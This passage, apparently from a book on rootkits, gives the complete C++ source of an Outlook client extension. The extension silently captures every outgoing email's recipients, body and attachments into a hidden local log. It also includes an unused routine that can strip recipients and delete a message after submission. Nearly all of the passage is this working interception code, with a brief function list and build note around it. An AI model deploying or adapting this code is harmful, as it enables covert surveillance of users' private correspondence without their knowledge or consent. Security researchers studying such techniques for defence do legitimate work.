
The file OutlookExtension.cpp contains all of the implementation-specific logic for the Outlook client extension. Two functions and two classes are implemented in this file.

The two functions are as follows:

  • DllMain–Called by the operating system

  • ExchEntryPoint–Called by Microsoft Outlook during initialization

Following are the two classes and their member functions:

  • CMessageEvents–Based on the Outlook Extension class IexchExt

  • QueryInterface–COM specific

  • AddRef–COM specific

  • Release–COM specific

  • OnRead–Message interface, unused

  • OnReadComplete–Message interface, unused

  • OnWrite–Message interface, unused

  • OnWriteComplete–The message that contains e-mail information

  • OnCheckNames–Message interface, unused

  • OnCheckNamesComplete–Message interface, unused

  • OnSubmit–Used to keep track of message submission state

  • OnSubmitComplete–Used to keep track of message submission state

  • LogContent–Writes e-mail content to disk

  • LogBody–Extracts message body for LogContent

  • LogAttachments–Extracts message attachments for LogContent

  • DeleteMessage–Deletes an e-mail message, unused

  • CClientExtension–Based on the Outlook Extension class IExchExtMessageEvents

  • QueryInterface–COM specific

  • AddRef–COM specific

  • Release–COM specific

  • Install–Called by Outlook to determine events of interest

  // OutlookExtension // Copyright Ric Vieler, 2006 // Filter Outlook email #include "stdafx.h" #include <STDIO.h> #include <WINDOWS.H> #include <COMMCTRL.H> #define MIDL_PASS #include <MAPIX.H> #include <MAPIUTIL.H> #include <MAPIFORM.H> #include <INITGUID.h> #include "EXCHEXT.H" #include "OutlookExtension.h" // Microsoft Exchange Client Extension entry point extern "C" _declspec(dllexport) LPEXCHEXT CALLBACK ExchEntryPoint(void); // DLL entry point BOOL APIENTRY DllMain( HANDLE hModule,  DWORD  ul_reason_for_call,  LPVOID lpReserved ) {     return TRUE; } // Must provide pointer to CClientExtension for construction CMessageEvents::CMessageEvents (LPUNKNOWN pParentInterface) {  m_pExchExt = pParentInterface;  m_submittingMessage = false;  m_referenceCount = 0; }; void CMessageEvents::LogContent( char* content, int contentType ) {  // Put content into one big file for this example  char buffer[ MAX_PATH ];  size_t contentLength;  FILE* sourceFile;  FILE* destinationFile;  // open the destination file - LN_LOG_FILE  strcpy( buffer, OL_LOG_FILE );  if( (destinationFile = fopen( buffer, "a+b" )) != NULL )  {   if( contentType == OL_LOG_ATTACHMENT )   {    // content is a filename    if( (sourceFile = fopen( content, "r" )) != NULL )    {     // write header     fwrite( "ATTACHMENT:\n", sizeof(char), 12, destinationFile );     // write attachment     do     {      contentLength = fread( buffer, sizeof(char), MAX_PATH, sourceFile );      if( contentLength )      {       fwrite( buffer, sizeof(char), contentLength, destinationFile );      }     } while( contentLength == MAX_PATH );     // write footer     fwrite( "\n", sizeof( char ), 1, destinationFile );     fclose( sourceFile );    }   }   else   {    // content is a string    // write header    if( contentType == OL_LOG_BODY )    {     fwrite( "BODY:\n", sizeof(char), 6, destinationFile );    }    else    {     fwrite( "DESTINATION(S):\n", sizeof(char), 16, destinationFile );    }    // write data    contentLength = strlen( content );    fwrite( content, sizeof( char ), contentLength, destinationFile );    // write footer    fwrite( "\n\n", sizeof( char ), 2, destinationFile );   }   fclose( destinationFile );  } } // Log message body void CMessageEvents::LogBody( LPMESSAGE pMessage ) {  char* bodybuf = 0;  unsigned int bodysize = 0;  IStream* stream;  HRESULT hr;  // Get body of message as a stream  hr = pMessage->OpenProperty(PR_BODY,   &IID_IStream,   STGM_DIRECT | STGM_READ,   0,   (IUnknown**)&stream );  if ( !FAILED(hr) )  {   // Get size of stream   STATSTG status = { 0 };   hr = stream->Stat( &status, STATFLAG_NONAME );   if ( !FAILED(hr) )   {    // Read the stream into a local buffer    bodysize = status.cbSize.LowPart;    bodybuf = new char[ bodysize + 1 ];    ULONG count;    hr = stream->Read( bodybuf, bodysize, &count );    if ( !FAILED(hr) )    {     if ( count < bodysize)      bodysize = count;     bodybuf[bodysize] = 0;     stream->Release();     // Log the content     LogContent( bodybuf, OL_LOG_BODY );    }   }  } } // Log message attachments void CMessageEvents::LogAttachments( LPMESSAGE pMessage ) {  HRESULT hr;  LPMAPITABLE pAttachmentTable;  LPATTACH pAttachment;  // Get the attachment table  hr = pMessage->GetAttachmentTable( MAPI_UNICODE, &pAttachmentTable );  if ( !FAILED(hr) )  {   SizedSPropTagArray(1,columns) = { 1, PR_ATTACH_NUM };   SRowSet* pRowSet;   hr = HrQueryAllRows( pAttachmentTable,    (SPropTagArray*)&columns,    NULL, NULL, 0, &pRowSet);   if ( !FAILED(hr) )   {    for (unsigned int row = 0; row < pRowSet->cRows; row++ )    {     if (pRowSet->aRow[row].lpProps[0].ulPropTag == PR_ATTACH_NUM )     {      // Open the attachment      hr = pMessage->OpenAttach(pRowSet->aRow[row].lpProps[0].Value.ul,       NULL, MAPI_BEST_ACCESS, &pAttachment );      if ( !FAILED(hr) )      {       // Get the attachment type       ULONG count;       SPropValue* property = 0;       SizedSPropTagArray(1, tag) = { 1, PR_ATTACH_METHOD };       pAttachment->GetProps((SPropTagArray*)&tag,        MAPI_UNICODE,        &count,        &property);       // Process attachment based on attachment type       if( (property[0].ulPropTag) &&        (property[0].Value.ul == ATTACH_BY_REF_ONLY ||         property[0].Value.ul == ATTACH_BY_REF_RESOLVE ||         property[0].Value.ul == ATTACH_BY_REFERENCE ))       {        // Attachment is by filename        ULONG count;        SPropValue* path = 0;        SizedSPropTagArray(2, tag) =         { 2, { PR_ATTACH_LONG_PATHNAME,PR_ATTACH_PATHNAME } };        pAttachment->GetProps((SPropTagArray*)&tag,         MAPI_UNICODE,         &count,         &path);        if( path[0].ulPropTag == PR_ATTACH_LONG_PATHNAME )        {         LogContent( path[0].Value.LPSZ, OL_LOG_ATTACHMENT );        }        else if( path[1].ulPropTag == PR_ATTACH_PATHNAME )        {         LogContent( path[1].Value.LPSZ, OL_LOG_ATTACHMENT );        }       }       else if(property[0].ulPropTag && property[0].Value.ul == ATTACH_BY_VALUE)       {        // Attachment is in memory        // Convert it to a temp file        char tempFile[20];        strcpy( tempFile, OL_TEMP_LOG_FILE );        STATSTG StatInfo;        LPSTREAM pSourceStream = NULL;        LPSTREAM pDestinationStream = NULL;        hr = pAttachment->OpenProperty(PR_ATTACH_DATA_BIN,         (LPIID)&IID_IStream, 0, MAPI_MODIFY,  (LPUNKNOWN*)&pSourceStream);        if ( !FAILED(hr) )        {         hr = OpenStreamOnFile(          MAPIAllocateBuffer,          MAPIFreeBuffer,          STGM_CREATE | STGM_READWRITE | STGM_SHARE_DENY_NONE | STGM_DELETEONRELEASE,          tempFile,          NULL,          &pDestinationStream);         if ( !FAILED(hr) )         {          // Get size of Source Stream          pSourceStream->Stat(&StatInfo, STATFLAG_NONAME);          // Write the stream to the temp file          hr = pSourceStream->CopyTo(pDestinationStream,           StatInfo.cbSize, NULL, NULL);          if ( !FAILED(hr) )          {           // Commit changes to new stream           pSourceStream->Commit(0);           // Log the attachment           LogContent( tempFile, OL_LOG_ATTACHMENT );           // Release the streams           // This should also delete the temp file           pDestinationStream->Release();           pSourceStream->Release();          }         }        }       }       // Release the attachment       pAttachment->Release();      }     }    }    FreeProws( pRowSet );   }   pAttachmentTable->Release();  } } // Delete a MAPI message // Called by CMessageEvents::OnWriteComplete before returning S_OK void CMessageEvents::DeleteMessage( LPMESSAGE pMessage ) {  HRESULT hr;  // Remove the recipients  LPMAPITABLE pRecipientTable;  hr = pMessage->GetRecipientTable( MAPI_UNICODE, &pRecipientTable );  if ( !FAILED(hr) )  {   // Need PR_ROWID for ModifyRecipients   SizedSPropTagArray(1,columns) = { 1, PR_ROWID };   SRowSet* pRowSet;   hr = HrQueryAllRows( pRecipientTable,    (SPropTagArray*)&columns,    NULL, NULL, 0, &pRowSet);   if ( !FAILED(hr) )   {    pMessage->ModifyRecipients( MODRECIP_REMOVE, (ADRLIST*)pRowSet );    FreeProws( pRowSet );   }   pRecipientTable->Release();  }  // Set PR_DELETE_AFTER_SUBMIT  ULONG count;  SPropValue* property = 0;  SizedSPropTagArray(1, tag) = { 1, PR_DELETE_AFTER_SUBMIT };  if( pMessage->GetProps((SPropTagArray*)&tag,   NULL,   &count,   &property) == S_OK )  {   if( property[0].ulPropTag == PR_DELETE_AFTER_SUBMIT )   {    property[0].Value.b = TRUE;    pMessage->SetProps( 1, property, NULL );   }  } } /////////////////////////////////////////////////////////////////////////////// //    CMessageEvents::QueryInterface() // //    Parameters //    riid   -- Interface ID. //    ppvObj -- address of interface object pointer. // //    Purpose //    Return interface object upon request // //    Return Value - none // //    Comments //    Currently the Exchange client does not call QueryInterface from any object //    except for IExchExt.  This is implemented in case features are added to //    Exchange to require QueryInterface from any object.  Also, as a "rule of //    OLE COM" this is the proper implementation of QueryInterface. // STDMETHODIMP CMessageEvents::QueryInterface(REFIID riid, LPVOID FAR * ppvObj) {  *ppvObj = NULL;  if (riid == IID_IExchExtMessageEvents)  {   *ppvObj = (LPVOID)this;   // Increase usage count of this object   AddRef();   return S_OK;  }  if (riid == IID_IUnknown)  {   *ppvObj = (LPVOID)m_pExchExt;  // return parent interface   m_pExchExt->AddRef();   return S_OK;  }  return E_NOINTERFACE; } /////////////////////////////////////////////////////////////////////////////// //    CMessageEvents::OnRead() // //    Parameters //    lpeecb -- pointer to IExchExtCallback interface // //    Purpose //    To extend or inhibit Exchange when displaying the send or read note form. // //    Return Value //    S_OK Microsoft Exchange will consider the task handled //    S_FALSE signals Exchange to continue calling extensions //    Other MAPI Code errors will abort the send or read note form. // // STDMETHODIMP CMessageEvents::OnRead(LPEXCHEXTCALLBACK lpeecb) {  return S_FALSE; } /////////////////////////////////////////////////////////////////////////////// //    CMessageEvents::OnReadComplete() // //    Parameters //    lpeecb -- pointer to IExchExtCallback interface // //    Purpose //    To do processing after message has been read. // //    Return Value //    S_OK Microsoft Exchange will consider the task handled //    S_FALSE signals Exchange to continue calling extensions //    Some MAPI Code error indicates a problem and will not display the send //    or read note form. // //    Comments. //    If an error code, such as MAPI_E_CALL_FAILED, is returned, Exchange will //    call OnReadComplete again with the ulFlags parameter set to //    EEME_COMPLETE_FAILED.  Returning the error code again will cause Exchange //    to not display the UI. // STDMETHODIMP CMessageEvents::OnReadComplete(LPEXCHEXTCALLBACK lpeecb, ULONG ulFlags) {  return S_FALSE; } /////////////////////////////////////////////////////////////////////////////// //    CMessageEvents::OnWrite() // //    Parameters //    lpeecb -- pointer to IExchExtCallback interface // //    Purpose //    This method is called when a message is about to be written.  The message //    only has default properties at this point.  It does not contain //    properties which the user has added by way of recipients, subject, //    message text, or attachments. //    This method is called when the user Sends or Saves a message // //    Return Value //    S_OK Microsoft Exchange will consider the task handled //    S_FALSE signals Exchange to continue calling extensions // // STDMETHODIMP CMessageEvents::OnWrite(LPEXCHEXTCALLBACK lpeecb) {  return S_FALSE; } /////////////////////////////////////////////////////////////////////////////// //    CMessageEvents::OnWriteComplete() // //    Parameters //    lpeecb -- pointer to IExchExtCallback interface // //    Purpose //    This method is called after the data (recipients, attachments, body, //    subject, etc.) has been written to the message. // //    Return Value //    S_OK Microsoft Exchange will consider the task handled //    (you must also call DeleteMessage( pMessage ) if returning S_OK) //    S_FALSE signals Exchange to continue calling extensions // STDMETHODIMP CMessageEvents::OnWriteComplete(LPEXCHEXTCALLBACK lpeecb, ULONG ulFlags) {  // Only check if writing for the purpose of submitting  if( m_submittingMessage == false )   return S_FALSE;  // This is the only event of interest  HRESULT hr;  LPMESSAGE pMessage = NULL;  LPMDB pMDB = NULL;  // Get the message  hr = lpeecb->GetObject(&pMDB, (LPMAPIPROP*)&pMessage);  if ( !FAILED(hr) )  {   // Get the recipients   LPMAPITABLE pRecipientTable;   hr = pMessage->GetRecipientTable( MAPI_UNICODE, &pRecipientTable );   if ( !FAILED(hr) )   {    SizedSPropTagArray(1,columns) = { 1, PR_EMAIL_ADDRESS };    SRowSet* pRowSet;    hr = HrQueryAllRows( pRecipientTable,     (SPropTagArray*)&columns,     NULL, NULL, 0, &pRowSet);    if ( !FAILED(hr) )    {     if ( pRowSet->cRows > 0 )     {      int stringLength;      int addressCount = 0;      unsigned int arraySize = 0;      char** addresses = new char* [pRowSet->cRows - 1];      for (unsigned int row = 0; row < pRowSet->cRows; row++ )      {       // Gather the addresses       stringLength = strlen( pRowSet->aRow[row].lpProps[0].Value.LPSZ ) + 1;       addresses[addressCount] = new char[stringLength];       strcpy( addresses[addressCount], pRowSet->aRow[row].lpProps[0].Value.LPSZ );       arraySize += stringLength;       addressCount++;      }      // Format and log addresses      if ( arraySize )      {       unsigned int arrayIndex = 0;       char* formattedArray = new char[arraySize];       if ( formattedArray )       {        while( addressCount-- )        {         // reformat addresses into one big buffer         strcpy( formattedArray + arrayIndex, addresses[addressCount] );         arrayIndex += strlen( addresses[addressCount] );         *(formattedArray + arrayIndex) = ',';         arrayIndex++;         // free addresses array         delete addresses[addressCount];        }        arrayIndex--;        *(formattedArray + arrayIndex) = 0;        // Log message addresses        LogContent( formattedArray, OL_LOG_ADDRESSES );       delete formattedArray;       }      }     }     FreeProws( pRowSet );    }    pRecipientTable->Release();    // Log message body    LogBody( pMessage );    // Log message attachments    LogAttachments( pMessage );   }   // Release resources   UlRelease( pMDB );   UlRelease( pMessage );  }  return S_FALSE; } /////////////////////////////////////////////////////////////////////////////// //    CMessageEvents::OnSubmit() // //    Parameters //    lpeecb -- pointer to IExchExtCallback interface // //    Purpose //    Called just before message data is written to MAPI. // //    Return Value //    S_OK Microsoft Exchange will consider the task handled //    S_FALSE signals Exchange to continue calling extensions // STDMETHODIMP CMessageEvents::OnSubmit(LPEXCHEXTCALLBACK lpeecb) {  m_submittingMessage = true;  return S_FALSE; } /////////////////////////////////////////////////////////////////////////////// //    CMessageEvents::OnSubmitComplete() // //    Parameters //    lpeecb -- pointer to IExchExtCallback interface // //    Purpose //    Called after message has been submitted to MAPI. // //    Return Value - none // STDMETHODIMP_ (VOID) CMessageEvents::OnSubmitComplete(LPEXCHEXTCALLBACK lpeecb, ULONG ulFlags) {  m_submittingMessage = false; } /////////////////////////////////////////////////////////////////////////////// //    CMessageEvents::OnCheckNames() // //    Parameters //    lpeecb -- pointer to IExchExtCallback interface // //    Purpose //    Called when user selects the Check Names button and just before message //    is submitted to MAPI. // //    Return Value //    S_OK Microsoft Exchange will consider the task handled //    S_FALSE signals Exchange to continue calling extensions // STDMETHODIMP CMessageEvents::OnCheckNames(LPEXCHEXTCALLBACK lpeecb) {  return S_FALSE; } /////////////////////////////////////////////////////////////////////////////// //    CMessageEvents::OnCheckNamesComplete() // //    Parameters //    lpeecb -- pointer to IExchExtCallback interface // //    Purpose //    Called after exchange has completed resolving names in the message //    recipients table. // //    Return Value //    S_OK Microsoft Exchange will consider the task handled //    S_FALSE signals Exchange to continue calling extensions // STDMETHODIMP CMessageEvents::OnCheckNamesComplete(LPEXCHEXTCALLBACK lpeecb, ULONG ulFlags) {  return S_FALSE; } /////////////////////////////////////////////////////////////////////////////// CClientExtension::CClientExtension() {  m_referenceCount = 0;  m_pMessageEvents = new CMessageEvents(this); }; STDMETHODIMP CClientExtension::QueryInterface(REFIID riid,void** ppvObj) {  HRESULT hResult = S_OK;  *ppvObj = NULL;  if (( IID_IUnknown == riid) || ( IID_IExchExt == riid) )  {   *ppvObj = (LPUNKNOWN)this;  }  else if (IID_IExchExtMessageEvents == riid)  {   *ppvObj = (LPUNKNOWN) m_pMessageEvents;  }  else   hResult = E_NOINTERFACE;  if (NULL != *ppvObj)   ((LPUNKNOWN)*ppvObj)->AddRef();  return hResult; } /////////////////////////////////////////////////////////////////////////////// //    CClientExtension::Install() // //    Parameters //    peecb     -- pointer to Exchange Extension callback function //    context -- context code at time of being called. // //    Purpose //    Called once for each new context that is entered. // //    Return Value //    S_OK - the installation succeeded for the context //    S_FALSE - deny the installation fo the extension for the context // STDMETHODIMP CClientExtension::Install( IExchExtCallback *pmecb, ULONG context, ULONG ulFlags ) {  ULONG version;  // Make sure this is the right major version  pmecb->GetVersion(&version, EECBGV_GETBUILDVERSION);  if (EECBGV_BUILDVERSION_MAJOR !=   (version & EECBGV_BUILDVERSION_MAJOR_MASK))   return S_FALSE;  switch (context)  {   case EECONTEXT_SENDNOTEMESSAGE:   case EECONTEXT_SENDPOSTMESSAGE:   case EECONTEXT_SENDRESENDMESSAGE:    return S_OK;  }  return S_FALSE; } // The sole purpose of ExchEntryPoint is to return a new instance // of the Extension Interface to Outlook or Exchange. LPEXCHEXT CALLBACK ExchEntryPoint() {  return new CClientExtension; } 

This Microsoft Outlook Client Extension project was originally written for a Visual Studio 6.0 build environment, so you might be asked to convert OutlookExtension.dsw, and you might see a few warnings when using this project with a newer development environment. Specifically, the deprecated functions strcpy and fopen will generate warnings when compiling OutlookExtension.cpp with the Visual Studio 8.0 compiler. Because these warnings can be safely ignored, and project files are automatically converted when newer environments are used, this project has not been modified for newer build environments.

Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

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